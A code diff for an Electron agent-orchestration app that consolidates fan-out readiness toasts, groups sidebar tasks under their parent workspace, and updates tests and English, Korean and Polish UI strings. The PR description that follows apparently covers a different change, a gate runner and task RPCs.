@@ -535,20 +565,24 @@ function reportResult(res: unknown, pushToast: PushToast, ownerWorkspaceId: stri
     message: parts.join(' · '),
   });
 
-  // F5 — 물질화된 성공 태스크마다 "diff 열기" 액션 토스트. 워크스페이스가 있어야
-  // 서피스를 열 수 있으므로 workspaceId·taskId가 채워진 태스크만 대상.
-  for (const task of tasks) {
-    if (!task.ok || !task.taskId || !task.workspaceId) continue;
-    const taskId = task.taskId;
-    const workspaceId = task.workspaceId;
-    const title = task.title ?? taskId;
-    pushToast({
-      level: 'info',
-      message: t('fanout.taskReady', { title }),
-      action: {
-        label: t('fanout.openDiff'),
-        onClick: () => openTaskDiff(taskId, workspaceId, title, ownerWorkspaceId),
-      },
-    });
-  }
+  // F5 — ONE toast for the diff entry point, not one per task. A fan-out of 8
+  // pushed 8 identical-looking cards on top of the summary that had just been
+  // posted, so the summary was off-screen before it could be read and the
+  // "open diff" action was 8 races to click the right card. The action now
+  // opens the first ready task's diff; the rest are one click away in the
+  // sidebar's task list, which is where they live permanently anyway.
+  const ready = tasks.filter((task) => task.ok && task.taskId && task.workspaceId);
+  const first = ready[0];
+  if (!first) return;
+  const taskId = first.taskId as string;
+  const workspaceId = first.workspaceId as string;
+  const title = first.title ?? taskId;
+  pushToast({
+    level: 'info',
+    message: ready.length === 1 ? t('fanout.taskReady', { title }) : t('fanout.tasksReady', { count: ready.length }),
+    action: {
+      label: ready.length === 1 ? t('fanout.openDiff') : t('fanout.openFirstDiff'),
+      onClick: () => openTaskDiff(taskId, workspaceId, title, ownerWorkspaceId),
+    },
+  });
 }

--- a/src/renderer/components/AgentToolbar/__tests__/FanOutDialog.emptyPrompt.dynamic.test.tsx
+++ b/src/renderer/components/AgentToolbar/__tests__/FanOutDialog.emptyPrompt.dynamic.test.tsx
@@ -1,0 +1,157 @@
+// @vitest-environment jsdom
+//
+// The all-empty launch confirm, and the role select's width floor.
+//
+// Launching N tasks with no prompt at all is legitimate ("open me N worktrees
+// and I'll type into them"), so it is confirmed rather than refused — but it is
+// almost never what someone means once they have filled in titles and roles.
+// What is pinned here is that the FIRST press asks and launches nothing, the
+// second press launches, and typing a prompt withdraws the question.
+
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import { createElement, act } from 'react';
+import { createRoot, type Root } from 'react-dom/client';
+
+import FanOutDialog from '../FanOutDialog';
+import { useStore } from '../../../stores';
+
+let container: HTMLDivElement;
+let root: Root;
+let start: ReturnType<typeof vi.fn>;
+
+beforeEach(() => {
+  localStorage.clear();
+  useStore.setState({ toasts: [] });
+  start = vi.fn(async () => ({ ok: true, tasks: [] }));
+  (window as unknown as { electronAPI: unknown }).electronAPI = { fanout: { start } };
+  container = document.createElement('div');
+  document.body.appendChild(container);
+  root = createRoot(container);
+  act(() => root.render(createElement(FanOutDialog, { onClose: vi.fn(), workspaceId: 'ws-1' })));
+});
+
+afterEach(() => {
+  act(() => root.unmount());
+  container.remove();
+});
+
+const q = <T extends HTMLElement>(id: string): T | null => container.querySelector(`[data-testid="${id}"]`);
+
+function click(id: string): void {
+  act(() => {
+    q<HTMLElement>(id)?.click();
+  });
+}
+
+function typeInto(id: string, value: string): void {
+  const el = q<HTMLTextAreaElement>(id) as HTMLTextAreaElement;
+  const setter = Object.getOwnPropertyDescriptor(HTMLTextAreaElement.prototype, 'value')?.set;
+  act(() => {
+    setter?.call(el, value);
+    el.dispatchEvent(new Event('input', { bubbles: true }));
+  });
+}
+
+function fillRepo(): void {
+  const el = q<HTMLInputElement>('fanout-repo') as HTMLInputElement;
+  const setter = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value')?.set;
+  act(() => {
+    setter?.call(el, '/repo');
+    el.dispatchEvent(new Event('input', { bubbles: true }));
+  });
+}
+
+describe('FanOutDialog — launching with no prompt at all', () => {
+  it('asks once, launches nothing, then launches on the second press', () => {
+    fillRepo();
+    expect(q('fanout-confirm-empty')).toBeNull();
+
+    click('fanout-submit');
+    expect(q('fanout-confirm-empty')).not.toBeNull();
+    expect(start).not.toHaveBeenCalled();
+
+    click('fanout-submit');
+    expect(start).toHaveBeenCalledTimes(1);
+  });
+
+  it('withdraws the question as soon as a prompt exists', () => {
+    fillRepo();
+    click('fanout-submit');
+    expect(q('fanout-confirm-empty')).not.toBeNull();
+
+    typeInto('fanout-prompt', 'do the thing');
+    expect(q('fanout-confirm-empty')).toBeNull();
+
+    // …and with a prompt the first press launches, no confirm at all.
+    click('fanout-submit');
+    expect(start).toHaveBeenCalledTimes(1);
+  });
+
+  it('never asks when a prompt was there from the start', () => {
+    fillRepo();
+    typeInto('fanout-prompt', 'do the thing');
+    click('fanout-submit');
+    expect(q('fanout-confirm-empty')).toBeNull();
+    expect(start).toHaveBeenCalledTimes(1);
+  });
+});
+
+describe('FanOutDialog — role select width', () => {
+  it('gives the role select room for a bound label instead of truncating it', () => {
+    const select = q<HTMLSelectElement>('fanout-role-0') as HTMLSelectElement;
+    expect(select).not.toBeNull();
+    // "Reviewer — claude" does not fit in the old 92px floor.
+    expect(parseInt(select.style.minWidth, 10)).toBeGreaterThanOrEqual(132);
+    // …and it is still capped, so it cannot squeeze the title field beside it.
+    expect(parseInt(select.style.maxWidth, 10)).toBeLessThanOrEqual(180);
+  });
+});
+
+
+// ── One toast per fan-out, not one per task ────────────────────────────────
+// Eight tasks used to push eight near-identical "Task \"…\" ready" cards on top
+// of the summary that had just been posted: the summary scrolled away before it
+// could be read, and "open diff" became a race to click the right card.
+describe('FanOutDialog — the launch report', () => {
+  const readyTasks = (count: number) =>
+    Array.from({ length: count }, (_, k) => ({
+      ok: true,
+      title: `task #${k + 1}`,
+      taskId: `wtask-${k}`,
+      workspaceId: `ws-child-${k}`,
+    }));
+
+  async function launchWith(tasks: unknown[]): Promise<void> {
+    start.mockResolvedValue({ ok: true, tasks });
+    fillRepo();
+    typeInto('fanout-prompt', 'do the thing');
+    await act(async () => {
+      q<HTMLElement>('fanout-submit')?.click();
+      await Promise.resolve();
+    });
+  }
+
+  it('reports four ready tasks with one toast, not four', async () => {
+    await launchWith(readyTasks(4));
+    const toasts = useStore.getState().toasts;
+    // One summary toast + one readiness toast. The count is the assertion: the
+    // old code posted 1 + N.
+    expect(toasts).toHaveLength(2);
+    const ready = toasts[1];
+    expect(ready?.message).toContain('4');
+    expect(ready?.action).toBeDefined();
+  });
+
+  it('still names the single task when only one is ready', async () => {
+    await launchWith(readyTasks(1));
+    const toasts = useStore.getState().toasts;
+    expect(toasts).toHaveLength(2);
+    expect(toasts[1]?.message).toContain('task #1');
+  });
+
+  it('posts no readiness toast when nothing materialized', async () => {
+    await launchWith([{ ok: true, title: 'unmaterialized', unmaterialized: true }]);
+    // Just the summary — there is no diff to open.
+    expect(useStore.getState().toasts).toHaveLength(1);
+  });
+});

--- a/src/renderer/components/Settings/SettingsPanel.tsx
+++ b/src/renderer/components/Settings/SettingsPanel.tsx
@@ -947,6 +947,18 @@ function OrchestratorSection() {
           label={t('settings.orchestratorBrain')}
         />
       </SettingRow>
+      {/* Picking the terminal runtime does not only swap the agent behind the
+          orchestrator: the panel itself becomes an embedded Claude Code TUI
+          instead of the chat surface. That is the change people actually
+          notice, and nothing said so before they picked it. */}
+      {deckBrainVendor === 'claude-pty' && (
+        <div
+          className="-mt-2 text-[11px] text-[var(--text-muted)]"
+          data-testid="orchestrator-claude-pty-note"
+        >
+          {t('settings.orchestratorBrainClaudePtyNote')}
+        </div>
+      )}
       <SettingRow id="model"
         label={t('settings.orchestratorModel')}
         description={t('settings.orchestratorModelDesc')}

--- a/src/renderer/components/Sidebar/MissionsSection.tsx
+++ b/src/renderer/components/Sidebar/MissionsSection.tsx
@@ -11,8 +11,11 @@
 // 같은 자식 워크스페이스가 사이드바 리스트(배지 있음)와 이 섹션(미션 행)에 모두 나올
 // 수 있고, 이는 의도된 이중 표현이다.
 //
-// 빈 상태: 미션이 하나도 없으면(대부분의 일반 워크스페이스) 이 컴포넌트는 null을
-// 반환해 **공간을 전혀 차지하지 않는다**(헤더조차 렌더하지 않음).
+// Empty state (changed): the section renders a single line rather than nothing.
+// A section that disappears cannot answer "does this workspace have tasks?" —
+// the reader is left unsure whether there are none or whether the list failed
+// to load, and the fan-out button next to it implies a list that should exist.
+// One line costs less than that ambiguity.
 //
 // Lifetime (owner policy): a mission row is visible only while its fan-out workspace
 // is alive. When the workspace is gone the row goes with it, and the record stays in
@@ -62,6 +65,47 @@ export function selectLiveMissions(
   );
 }
 
+/** One parent workspace and the tasks it started. */
+export interface MissionGroup {
+  parentId: string;
+  /** The parent workspace's name, or its id when it is no longer in the list
+   *  (a task outliving its parent is rare but must not render as blank). */
+  parentName: string;
+  tasks: WorkTask[];
+}
+
+/**
+ * Group live tasks under the workspace that started them. A task belongs to
+ * exactly one parent (the cache is keyed by it), so this is a partition, not a
+ * join — and the parent is what makes a flat list of eight `task #2`s legible
+ * once two fan-outs are running at once.
+ *
+ * Ordering is the parent's own order in the sidebar, so the tree reads in the
+ * same sequence as the workspace list above it; a parent that has gone away
+ * sorts last, under its id.
+ */
+export function groupMissionsByParent(
+  byWorkspace: Record<string, WorkTask[]>,
+  liveWorkspaceIds: ReadonlySet<string>,
+  parentNames: ReadonlyMap<string, string>,
+  parentOrder: readonly string[],
+): MissionGroup[] {
+  const groups: MissionGroup[] = [];
+  const rank = new Map(parentOrder.map((id, i) => [id, i]));
+  for (const [parentId, tasks] of Object.entries(byWorkspace)) {
+    const live = tasks.filter((task) => !task.paneGroupId || liveWorkspaceIds.has(task.paneGroupId));
+    if (live.length === 0) continue;
+    groups.push({
+      parentId,
+      parentName: parentNames.get(parentId) ?? parentId,
+      tasks: live.sort((a, b) => b.createdAt - a.createdAt),
+    });
+  }
+  return groups.sort(
+    (a, b) => (rank.get(a.parentId) ?? Number.MAX_SAFE_INTEGER) - (rank.get(b.parentId) ?? Number.MAX_SAFE_INTEGER),
+  );
+}
+
 function useLiveMissions(): WorkTask[] {
   const byWorkspace = useStore(useShallow((s) => s.missionsByWorkspace));
   // Subscribe to the id array with a shallow compare (renames and metadata changes do
@@ -75,7 +119,26 @@ function useLiveMissions(): WorkTask[] {
   );
 }
 
-function MissionRow({ task }: { task: WorkTask }): React.ReactElement {
+/** The same live set, partitioned by the workspace that started each task. */
+function useLiveMissionGroups(): MissionGroup[] {
+  const byWorkspace = useStore(useShallow((s) => s.missionsByWorkspace));
+  const workspaceIds = useStore(useShallow((s) => s.workspaces.map((w) => w.id)));
+  // Names are subscribed to separately so a rename repaints the parent row —
+  // and shallow-compared, so unrelated workspace metadata churn does not.
+  const workspaceNames = useStore(useShallow((s) => s.workspaces.map((w) => w.name)));
+  return useMemo(
+    () =>
+      groupMissionsByParent(
+        byWorkspace,
+        new Set(workspaceIds),
+        new Map(workspaceIds.map((id, i) => [id, workspaceNames[i] ?? id])),
+        workspaceIds,
+      ),
+    [byWorkspace, workspaceIds, workspaceNames],
+  );
+}
+
+function MissionRow({ task, indented = false }: { task: WorkTask; indented?: boolean }): React.ReactElement {
   const t = useT();
   // 자식 워크스페이스 존재 여부(존재할 때만 행 클릭으로 점프 가능).
   const childExists = useStore((s) =>
@@ -97,7 +160,7 @@ function MissionRow({ task }: { task: WorkTask }): React.ReactElement {
 
   return (
     <div
-      className={`group flex items-center gap-2 mx-2 px-3 py-1 rounded-md select-none ${
+      className={`group flex items-center gap-2 mx-2 ${indented ? 'pl-6 pr-3' : 'px-3'} py-1 rounded-md select-none ${
         task.paneGroupId && childExists
           ? 'cursor-pointer hover:bg-[rgba(var(--bg-surface-rgb),0.5)]'
           : ''
@@ -139,21 +202,26 @@ function MissionRow({ task }: { task: WorkTask }): React.ReactElement {
   );
 }
 
-function MissionsSection(): React.ReactElement | null {
+function MissionsSection(): React.ReactElement {
   const t = useT();
   const missions = useLiveMissions();
-  // Collapse for the whole section (expanded by default — open missions are the work
-  // that is running right now).
+  const groups = useLiveMissionGroups();
+  // Collapse for the whole section (expanded by default — running tasks are the work
+  // that is happening right now).
   const [expanded, setExpanded] = useState(true);
-  // Done missions get their own disclosure (collapsed by default). A mission row stays
-  // valid as long as its workspace is alive (jump and channel links still work), but
-  // there is no reason for it to sit permanently expanded taking up room.
+  // Finished tasks get their own disclosure, collapsed by default, with a one-line
+  // summary on the toggle itself. A task row stays valid as long as its workspace is
+  // alive (jump and channel links still work), but there is no reason for a finished
+  // one to sit permanently expanded taking up room — and the summary means collapsing
+  // it does not hide WHICH task finished last.
   const [doneExpanded, setDoneExpanded] = useState(false);
-  const open = missions.filter((t) => t.status === 'open');
-  const done = missions.filter((t) => t.status !== 'open');
-
-  // 빈 상태: 미션이 없으면 아무 것도 렌더하지 않는다(공간 0).
-  if (missions.length === 0) return null;
+  const done = missions.filter((m) => m.status !== 'open');
+  // Only the running tasks are grouped under their parent: a finished task's parent
+  // is no longer where the reader is going next, and repeating the tree there would
+  // double the section's height for information nobody acts on.
+  const openGroups = groups
+    .map((g) => ({ ...g, tasks: g.tasks.filter((m) => m.status === 'open') }))
+    .filter((g) => g.tasks.length > 0);
 
   return (
     <div className="mb-1" data-missions-section>
@@ -172,11 +240,26 @@ function MissionsSection(): React.ReactElement | null {
         </span>
         <span>{t('missions.title', { count: missions.length })}</span>
       </button>
-      {expanded && (
+      {expanded && missions.length === 0 && (
+        <div className="px-4 py-1 text-[10px] font-mono text-[var(--text-muted)]" data-missions-empty>
+          {t('missions.empty')}
+        </div>
+      )}
+      {expanded && missions.length > 0 && (
         <>
           <div className="space-y-0.5" data-missions-open-group>
-            {open.map((task) => (
-              <MissionRow key={task.id} task={task} />
+            {openGroups.map((group) => (
+              <div key={group.parentId} data-missions-parent={group.parentId}>
+                <div
+                  className="px-4 py-0.5 truncate text-[9px] font-mono uppercase tracking-widest text-[var(--text-subtle)]"
+                  title={group.parentName}
+                >
+                  {group.parentName}
+                </div>
+                {group.tasks.map((task) => (
+                  <MissionRow key={task.id} task={task} indented />
+                ))}
+              </div>
             ))}
           </div>
           {done.length > 0 && (
@@ -195,6 +278,11 @@ function MissionsSection(): React.ReactElement | null {
                   <IconChevron size={9} />
                 </span>
                 <span>{t('missions.done', { count: done.length })}</span>
+                {/* `done` is newest-first (selectLiveMissions sorts by createdAt
+                    desc within a status), so [0] is the most recent one. */}
+                <span className="min-w-0 flex-1 truncate text-left normal-case tracking-normal text-[var(--text-subtle)]" data-missions-done-summary>
+                  {t('missions.doneSummary', { title: done[0]?.title ?? '' })}
+                </span>
               </button>
               {doneExpanded && (
                 <div className="space-y-0.5 opacity-60">

--- a/src/renderer/components/Sidebar/__tests__/MissionsSection.test.tsx
+++ b/src/renderer/components/Sidebar/__tests__/MissionsSection.test.tsx
@@ -3,11 +3,11 @@
 // Vitest는 jsdom 없이 node env로 돈다 — renderToStaticMarkup은 zustand의 SSR
 // 스냅샷(스토어 생성 시점 상태)만 읽어 setState 이후 값은 반영하지 못한다. 따라서
 // 표시 로직의 핵심(평탄화·정렬)은 순수 함수 flattenMissions로 분리해 직접 검증하고,
-// 빈 상태(null 반환 → 공간 0)만 SSR로 고정한다(생성 시점 미션 캐시는 비어 있음).
+// 빈 상태만 SSR로 고정한다(생성 시점 미션 캐시는 비어 있음).
 import { describe, expect, it } from 'vitest';
 import { renderToStaticMarkup } from 'react-dom/server';
 import { createElement } from 'react';
-import MissionsSection, { flattenMissions, selectLiveMissions } from '../MissionsSection';
+import MissionsSection, { flattenMissions, groupMissionsByParent, selectLiveMissions } from '../MissionsSection';
 import type { WorkTask } from '../../../../shared/workTask';
 
 function mission(over: Partial<WorkTask> & Pick<WorkTask, 'id' | 'title'>): WorkTask {
@@ -23,10 +23,16 @@ function mission(over: Partial<WorkTask> & Pick<WorkTask, 'id' | 'title'>): Work
 }
 
 describe('MissionsSection', () => {
-  it('빈 캐시에서는 아무 것도 렌더하지 않는다(공간 0)', () => {
+  // Changed from "renders nothing": a section that disappears cannot answer
+  // "does this workspace have tasks?", and the reader cannot tell an empty list
+  // from a list that failed to load.
+  it('renders a one-line empty state instead of nothing', () => {
     // 스토어 생성 시점 missionsByWorkspace는 비어 있으므로 SSR은 빈 상태를 본다.
     const html = renderToStaticMarkup(createElement(MissionsSection));
-    expect(html).toBe('');
+    expect(html).not.toBe('');
+    expect(html).toContain('data-missions-empty');
+    // The header is still there, and it says zero rather than hiding.
+    expect(html).toContain('data-missions-section');
   });
 
   describe('flattenMissions (순수)', () => {
@@ -123,5 +129,83 @@ describe('selectLiveMissions (pure)', () => {
       live('parent-a'),
     );
     expect(out).toEqual([]);
+  });
+});
+
+
+// ── Tasks indented under the workspace that started them ───────────────────
+// A flat list of eight rows called "task #1"…"task #4" twice over is unreadable
+// the moment two fan-outs are running, and the parent is the only thing that
+// tells them apart.
+describe('groupMissionsByParent (pure)', () => {
+  const names = new Map([
+    ['parent-a', 'api'],
+    ['parent-b', 'web'],
+  ]);
+  const order = ['parent-a', 'parent-b'];
+
+  it('partitions tasks under their own parent', () => {
+    const groups = groupMissionsByParent(
+      {
+        'parent-a': [mission({ id: 'a1', title: 'A', paneGroupId: 'c1' })],
+        'parent-b': [mission({ id: 'b1', title: 'B', paneGroupId: 'c2' })],
+      },
+      new Set(['parent-a', 'parent-b', 'c1', 'c2']),
+      names,
+      order,
+    );
+    expect(groups.map((g) => [g.parentName, g.tasks.map((t) => t.id)])).toEqual([
+      ['api', ['a1']],
+      ['web', ['b1']],
+    ]);
+  });
+
+  it('drops a task whose own workspace is gone, and the group with it', () => {
+    const groups = groupMissionsByParent(
+      { 'parent-a': [mission({ id: 'gone', title: 'A', paneGroupId: 'c-dead' })] },
+      new Set(['parent-a']),
+      names,
+      order,
+    );
+    expect(groups).toEqual([]);
+  });
+
+  it('falls back to the parent id when the workspace is no longer listed', () => {
+    const groups = groupMissionsByParent(
+      { 'parent-x': [mission({ id: 'a1', title: 'A' })] },
+      new Set(['parent-x']),
+      names,
+      order,
+    );
+    expect(groups[0].parentName).toBe('parent-x');
+  });
+
+  it('orders groups by the sidebar order, unknown parents last', () => {
+    const groups = groupMissionsByParent(
+      {
+        'parent-x': [mission({ id: 'x1', title: 'X' })],
+        'parent-b': [mission({ id: 'b1', title: 'B' })],
+        'parent-a': [mission({ id: 'a1', title: 'A' })],
+      },
+      new Set(['parent-a', 'parent-b', 'parent-x']),
+      names,
+      order,
+    );
+    expect(groups.map((g) => g.parentId)).toEqual(['parent-a', 'parent-b', 'parent-x']);
+  });
+
+  it('sorts newest first inside a group', () => {
+    const groups = groupMissionsByParent(
+      {
+        'parent-a': [
+          mission({ id: 'older', title: 'O', createdAt: 1 }),
+          mission({ id: 'newer', title: 'N', createdAt: 5 }),
+        ],
+      },
+      new Set(['parent-a']),
+      names,
+      order,
+    );
+    expect(groups[0].tasks.map((t) => t.id)).toEqual(['newer', 'older']);
   });
 });

--- a/src/renderer/i18n/locales/en.ts
+++ b/src/renderer/i18n/locales/en.ts
@@ -57,7 +57,6 @@ export const en = {
   // to "does this workspace have tasks", and a section that vanishes is not.
   'missions.empty': 'No tasks yet',
   'missions.doneSummary': 'last: {title}',
-  'missions.parentless': 'Other workspaces',
 
   // Sidebar — Company mode
   'company.deptRemoveHint': 'Right-click to remove',

--- a/src/renderer/i18n/locales/en.ts
+++ b/src/renderer/i18n/locales/en.ts
@@ -46,13 +46,18 @@ export const en = {
   // Sidebar — workspace search
   'sidebar.searchPlaceholder': 'Search workspaces…',
 
-  // Sidebar — Missions (fan-out tasks)
-  'missions.open': 'open',
-  'missions.closed': 'closed',
-  'missions.openChannel': 'Open mission channel',
-  'missions.openChannelFor': 'Open mission channel for {title}',
-  'missions.title': 'Missions ({count})',
-  'missions.done': 'Done ({count})',
+  // Sidebar — Tasks (the isolated worktree tasks an orchestrator runs)
+  'missions.open': 'running',
+  'missions.closed': 'finished',
+  'missions.openChannel': 'Open task channel',
+  'missions.openChannelFor': 'Open task channel for {title}',
+  'missions.title': 'Tasks ({count})',
+  'missions.done': 'Finished ({count})',
+  // Shown instead of hiding the section outright: an empty list is the answer
+  // to "does this workspace have tasks", and a section that vanishes is not.
+  'missions.empty': 'No tasks yet',
+  'missions.doneSummary': 'last: {title}',
+  'missions.parentless': 'Other workspaces',
 
   // Sidebar — Company mode
   'company.deptRemoveHint': 'Right-click to remove',
@@ -701,11 +706,16 @@ export const en = {
   'settings.cursorUnderline': 'Underline',
   // Orchestrator (command deck brain) settings
   'settings.orchestrator': 'Orchestrator',
-  'settings.orchestratorBrain': 'Orchestrator brain',
+  'settings.orchestratorBrain': 'Orchestrator runtime',
   'settings.orchestratorBrainDesc':
-    'Which agent runtime drives the Command Deck. The terminal brain is the default — it drives your own claude binary on your subscription. Hermes (ACP) requires the Hermes Agent CLI installed and authenticated on this machine — run its own setup first. Applies from the next brain turn; each brain keeps its own conversation history.',
+    'Which agent runtime drives the orchestrator. The terminal runtime is the default — it drives your own claude binary on your subscription. Hermes (ACP) requires the Hermes Agent CLI installed and authenticated on this machine — run its own setup first. Applies from the next orchestrator turn; each runtime keeps its own conversation history.',
   'settings.orchestratorBrainClaude': 'Claude Code (SDK)',
   'settings.orchestratorBrainClaudePty': 'Claude Code (terminal, default) — subscription',
+  // Picking this one does not just change the runtime: the orchestrator panel
+  // becomes an embedded terminal instead of the chat surface, which is a
+  // visible change people have hit without warning.
+  'settings.orchestratorBrainClaudePtyNote':
+    'Runs the orchestrator as a terminal: the panel shows the Claude Code TUI instead of the chat view.',
   'settings.orchestratorBrainHermes': 'Hermes Agent (ACP) — experimental',
   'settings.orchestratorModel': 'Orchestrator model',
   'settings.orchestratorModelDesc':
@@ -1714,7 +1724,11 @@ export const en = {
   'fanout.summaryUnmaterialized': '{count} unmaterialized',
   'fanout.summaryDisconnected': '{count} channel-disconnected',
   'fanout.taskReady': 'Task "{title}" ready',
+  'fanout.tasksReady': '{count} tasks ready',
   'fanout.openDiff': 'Open diff',
+  'fanout.openFirstDiff': 'Open first diff',
+  'fanout.confirmEmpty':
+    'None of these {n} tasks has a prompt. They will open with a worktree and an idle agent pane, and you type into each one yourself. Start them anyway?',
 
   // ─── Diff panel: task-output review, hunk adoption, comments, PR/close ────
   'diff.taskNotFound': 'Task not found — worktree lost or corrupted',

--- a/src/renderer/i18n/locales/ko.ts
+++ b/src/renderer/i18n/locales/ko.ts
@@ -313,11 +313,13 @@ export const ko = {
   // agent (커맨드 데크 브레인) 설정 — 명칭은 영문 "agent" 고정(번역·한글화
   // 금지, 오너 결정 2026-07-13: "오케스트레이터"는 한글 UI에서 넘침).
   'settings.orchestrator': 'agent',
-  'settings.orchestratorBrain': 'agent 브레인',
+  'settings.orchestratorBrain': 'agent 런타임',
   'settings.orchestratorBrainDesc':
-    '커맨드 데크를 구동할 에이전트 런타임. 기본은 터미널 브레인으로, 본인 claude 바이너리를 구독으로 구동합니다. Hermes(ACP)는 이 PC에 Hermes Agent CLI 설치·인증이 필요합니다(자체 setup 먼저). 다음 agent 턴부터 적용되며 브레인별로 대화 이력이 따로 유지됩니다.',
+    'agent를 구동할 에이전트 런타임. 기본은 터미널 런타임으로, 본인 claude 바이너리를 구독으로 구동합니다. Hermes(ACP)는 이 PC에 Hermes Agent CLI 설치·인증이 필요합니다(자체 setup 먼저). 다음 agent 턴부터 적용되며 런타임별로 대화 이력이 따로 유지됩니다.',
   'settings.orchestratorBrainClaude': 'Claude Code (SDK)',
   'settings.orchestratorBrainClaudePty': 'Claude Code (터미널, 기본) — 구독',
+  'settings.orchestratorBrainClaudePtyNote':
+    'agent가 터미널로 동작합니다 — 패널이 채팅 화면 대신 Claude Code TUI를 표시합니다.',
   'settings.orchestratorBrainHermes': 'Hermes Agent (ACP) — 실험적',
   'settings.orchestratorModel': 'agent 모델',
   'settings.orchestratorModelDesc':
@@ -1184,8 +1186,22 @@ export const ko = {
   'fanout.summaryFailed': '실패 {fail}',
   'fanout.summaryUnmaterialized': '미물질화 {count}',
   'fanout.summaryDisconnected': '채널 미연결 {count}',
+  // 사이드바 태스크 섹션(영문 키 이름은 mission이지만 UI 어휘는 태스크).
+  'missions.open': '실행 중',
+  'missions.closed': '완료',
+  'missions.openChannel': '태스크 채널 열기',
+  'missions.openChannelFor': '{title} 태스크 채널 열기',
+  'missions.title': '태스크 ({count})',
+  'missions.done': '완료 ({count})',
+  'missions.empty': '아직 태스크 없음',
+  'missions.doneSummary': '최근: {title}',
+  'missions.parentless': '다른 워크스페이스',
   'fanout.taskReady': '태스크 "{title}" 준비됨',
+  'fanout.tasksReady': '태스크 {count}개 준비됨',
   'fanout.openDiff': 'diff 열기',
+  'fanout.openFirstDiff': '첫 diff 열기',
+  'fanout.confirmEmpty':
+    '{n}개 태스크 모두 프롬프트가 없습니다. worktree와 빈 에이전트 페인만 열리고 직접 입력해야 합니다. 그래도 시작할까요?',
 
   // ─── Diff panel: task-output review, hunk adoption, comments, PR/close ────
   'diff.taskNotFound': '태스크를 찾을 수 없음 — worktree 소실 또는 손상',

--- a/src/renderer/i18n/locales/ko.ts
+++ b/src/renderer/i18n/locales/ko.ts
@@ -1195,7 +1195,6 @@ export const ko = {
   'missions.done': '완료 ({count})',
   'missions.empty': '아직 태스크 없음',
   'missions.doneSummary': '최근: {title}',
-  'missions.parentless': '다른 워크스페이스',
   'fanout.taskReady': '태스크 "{title}" 준비됨',
   'fanout.tasksReady': '태스크 {count}개 준비됨',
   'fanout.openDiff': 'diff 열기',

--- a/src/renderer/i18n/locales/pl.ts
+++ b/src/renderer/i18n/locales/pl.ts
@@ -55,7 +55,6 @@ export const pl = {
   'missions.done': 'Ukończone ({count})',
   'missions.empty': 'Brak zadań',
   'missions.doneSummary': 'ostatnie: {title}',
-  'missions.parentless': 'Inne przestrzenie robocze',
 
   // Sidebar — Company mode
   'company.deptRemoveHint': 'Kliknij prawym przyciskiem, aby usunąć',

--- a/src/renderer/i18n/locales/pl.ts
+++ b/src/renderer/i18n/locales/pl.ts
@@ -47,12 +47,15 @@ export const pl = {
   'sidebar.searchPlaceholder': 'Szukaj obszarów roboczych…',
 
   // Sidebar — Missions (fan-out tasks)
-  'missions.open': 'otwarte',
-  'missions.closed': 'zamknięte',
-  'missions.openChannel': 'Otwórz kanał misji',
-  'missions.openChannelFor': 'Otwórz kanał misji dla {title}',
-  'missions.title': 'Misje ({count})',
+  'missions.open': 'w toku',
+  'missions.closed': 'ukończone',
+  'missions.openChannel': 'Otwórz kanał zadania',
+  'missions.openChannelFor': 'Otwórz kanał zadania dla {title}',
+  'missions.title': 'Zadania ({count})',
   'missions.done': 'Ukończone ({count})',
+  'missions.empty': 'Brak zadań',
+  'missions.doneSummary': 'ostatnie: {title}',
+  'missions.parentless': 'Inne przestrzenie robocze',
 
   // Sidebar — Company mode
   'company.deptRemoveHint': 'Kliknij prawym przyciskiem, aby usunąć',
@@ -710,6 +713,8 @@ export const pl = {
     'Który runtime agenta napędza Command Deck. Mózg terminalowy jest domyślny — steruje Twoim własnym plikiem binarnym claude na Twojej subskrypcji. Hermes (ACP) wymaga zainstalowanego i uwierzytelnionego Hermes Agent CLI na tej maszynie — najpierw uruchom jego własną konfigurację. Obowiązuje od następnej tury mózgu; każdy mózg trzyma własną historię rozmowy.',
   'settings.orchestratorBrainClaude': 'Claude Code (SDK)',
   'settings.orchestratorBrainClaudePty': 'Claude Code (terminal, domyślny) — subskrypcja',
+  'settings.orchestratorBrainClaudePtyNote':
+    'Uruchamia orkiestratora jako terminal: panel pokazuje TUI Claude Code zamiast widoku czatu.',
   'settings.orchestratorBrainHermes': 'Hermes Agent (ACP) — eksperymentalny',
   'settings.orchestratorModel': 'Model orkiestratora',
   'settings.orchestratorModelDesc':
@@ -1720,7 +1725,11 @@ export const pl = {
   'fanout.summaryUnmaterialized': '{count} niezmaterializowanych',
   'fanout.summaryDisconnected': '{count} z rozłączonym kanałem',
   'fanout.taskReady': 'Zadanie "{title}" gotowe',
+  'fanout.tasksReady': 'Gotowych zadań: {count}',
   'fanout.openDiff': 'Otwórz diff',
+  'fanout.openFirstDiff': 'Otwórz pierwszy diff',
+  'fanout.confirmEmpty':
+    'Żadne z tych {n} zadań nie ma promptu. Otworzą się z worktree i bezczynnym panelem agenta, a treść wpiszesz samodzielnie. Uruchomić mimo to?',
 
   // ─── Diff panel: task-output review, hunk adoption, comments, PR/close ────
   'diff.taskNotFound': 'Nie znaleziono zadania — worktree utracony lub uszkodzony',


### PR DESCRIPTION
## Why

The orchestrator brain could not judge or harvest a fan-out task without a human: closing, opening a PR and adopting were Electron-IPC-only, and the only way to run the project gate was to type commands into a pane and poll the screen. This is lane O2 of the orchestrator track (wave 1).

## What

- **Gate runner** (`TaskGateRunner`): runs a fixed, allow-listed command set in the task worktree — the trusted `wmux.json` verify script if declared, else `npm run lint` then `npm test` (each only if the script exists). Fixed argv, no shell. 15-minute timeout, process-group kill on cancel, one gate per task, `skipped: deps_missing` instead of a false fail when `node_modules` is missing or a symlink. The verdict is recorded on the task ledger through a `LedgerPort` seam with compare-and-swap on `rev`; the tail is bounded and treated as untrusted.
- **Pipe RPCs** `task.gate.run`, `task.gate.cancel`, `task.adopt`, `task.close`, `task.pr`, plus read-only `task.git.status`, `task.git.log`, `task.gh.prView`, on the same service instances the GUI drives, with the fan-out RPC's gates (local origin, server-resolved workspace, owner-scoped task lookup). New `TaskAdoptService` for task-level adopt (clean target, 3-way apply, left unstaged).
- **MCP tools** `task_gate_run`, `task_adopt`, `task_close`, `task_pr`, `git_status`, `git_log`, `gh_pr_view` as `register*` functions. They are NOT registered on any surface yet — registration, the `RpcMethod` union entries and the `TEARDOWN_DENY_METHODS` verdict for `task.close` land with lane F (see `docs/internal/orch-o2-tool-contract.md`).
